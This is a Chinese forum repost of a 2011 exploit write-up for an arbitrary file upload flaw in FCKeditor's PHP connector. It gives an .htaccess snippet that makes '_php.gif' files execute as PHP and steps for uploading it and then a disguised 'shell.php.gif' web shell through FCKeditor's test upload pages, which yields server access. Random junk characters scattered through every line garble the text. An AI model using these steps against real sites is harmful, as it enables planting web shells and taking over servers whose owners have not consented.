FCKeditor所有php版本Upload上传漏洞
- n4 A8 o' k: g8 h( J4 A作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07- _# z0 P2 ?0 K9 B
减小字体 增大字体
9 u6 }/ }- r7 N[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
* K. }" K2 d: {+ D. Q: F[+] Date: 20110 T- Q6 I/ V9 M. j) g' Q$ w" Y
[+] Author : sinesafe.cn$ D; D) P9 X3 R6 P, C
[+] Website : WwW.sinesafe.cn
# R& h+ D3 n* B8 L! q2 ]———————————————————
7 z D% w/ @7 m. v1.create a htaccess file:
1 k2 f+ ~3 q e4 T! B. wcode:
' v+ U8 Y+ K1 M$ j: V# S; u2 m( @<FilesMatch “_php.gif”>* |7 K ?9 w4 ?
SetHandler application/x-httpd-php" ]2 ]4 l: N1 H7 }) Q b( l! q5 B
</FilesMatch>. S! A$ K+ K4 F" \# R" E# O
$ ?& P8 ~% c( y# V. k* ^$ \0 |; H( L d! ]2.Now upload this htaccess with FCKeditor.
' S+ A8 r: Y* o ?+ Q+ W/ I2 }5 \
2 b; v/ S2 w. J7 Q* S( ]http://www.sinesafe.cn/FCKeditor ... er/upload/test.html6 ?1 A0 c M5 F
3 B/ G# a3 d" ]' R5 C% g" ehttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html4 h B+ X9 X$ N
: F; D [$ ]8 N0 k$ T h. N3 w———————————————————————————————- S- C2 L9 `8 E Q' C6 s: a9 K
3.Now upload shell.php.gif with FCKeditor.
2 M6 b: p; l) D" Q4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
1 b& P, F: v/ ~4 v- b5.http://www.sinesafe.cn/anything/shell_php.gif
% {) ?+ k; m- }6.Now shell is available from server. | 8 _* S2 I$ y6 N" ~2 X5 G
, V6 @/ w! V J/ y1 d
Z4 E9 x1 U; i: c4 r
|